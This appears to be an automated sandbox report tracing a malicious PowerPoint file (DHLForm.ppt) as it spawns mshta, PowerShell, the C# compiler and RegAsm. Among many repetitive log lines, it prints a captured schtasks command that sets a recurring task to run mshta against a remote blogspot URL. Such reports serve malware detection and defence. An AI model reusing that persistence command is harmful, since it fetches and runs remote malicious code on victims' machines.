Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File created: C:\Users\user\AppData\Local\Temp\{FA52A1A1-15FF-46EB-B281-0249065605E6} - OProcSessId.dat Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:676:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_01
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: DHLForm.ppt Initial sample: OLE summary keywords = hammers
Source: DHLForm.ppt Initial sample: OLE document summary mmclips = 0
Source: DHLForm.ppt Initial sample: OLE summary subject = hammers
Source: DHLForm.ppt Initial sample: OLE document summary hiddenslides = 0
Source: DHLForm.ppt Initial sample: OLE document summary slides = 0
Source: DHLForm.ppt Initial sample: OLE document summary notes = 0
Source: DHLForm.ppt Initial sample: OLE document summary bytes = 0
Source: DHLForm.ppt Initial sample: OLE document summary presentationtarget = Widescreen

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\mshta.exe Code function: 6_2_0A2EE86D push cs; iretd 6_2_0A2EE86F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_053ABF22 push es; ret 9_2_053ABF36
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_053ABEE0 push es; ret 9_2_053ABF16
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_053ABEC0 push es; ret 9_2_053ABED6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 22_2_00007FFAEB5B1594 push eax; ret 22_2_00007FFAEB5B15A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FBC200 push 00000005h; ret 40_2_02FBC218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 40_2_02FB4770 push 2C418B05h; ret 40_2_02FB47E3
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.dll Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\cmd.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
